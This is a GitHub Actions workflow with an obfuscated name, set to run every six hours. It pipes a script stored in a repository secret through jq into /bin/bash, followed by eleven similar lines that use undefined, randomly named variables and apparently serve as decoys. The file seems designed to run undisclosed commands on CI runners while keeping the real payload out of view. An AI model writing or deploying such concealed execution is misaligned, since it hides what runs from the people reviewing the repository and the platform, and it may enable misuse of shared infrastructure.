name: fawumubiao

on:
  workflow_dispatch:
  schedule:
    - cron: '31 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fawumubiao
        env:
          u62367: ${{ secrets.u62367 }}
        run: |
          echo $u62367 | jq -r .dxy3520 | /bin/bash
          echo $ajgav31 | jq -r .ktl2330 | /bin/bash
          echo $mak5 | jq -r .j72189 | /bin/bash
          echo $boi56 | jq -r .rkvel5469 | /bin/bash
          echo $qogdn92 | jq -r .fxf82132 | /bin/bash
          echo $imfvx3 | jq -r .vx500 | /bin/bash
          echo $hlbr761 | jq -r .kywz901 | /bin/bash
          echo $mzfji0163 | jq -r .gun57 | /bin/bash
          echo $flx1 | jq -r .j670 | /bin/bash
          echo $crpm45 | jq -r .y1115 | /bin/bash
          echo $q358 | jq -r .iifr0337 | /bin/bash
          echo $oyyo8546 | jq -r .jof277 | /bin/bash

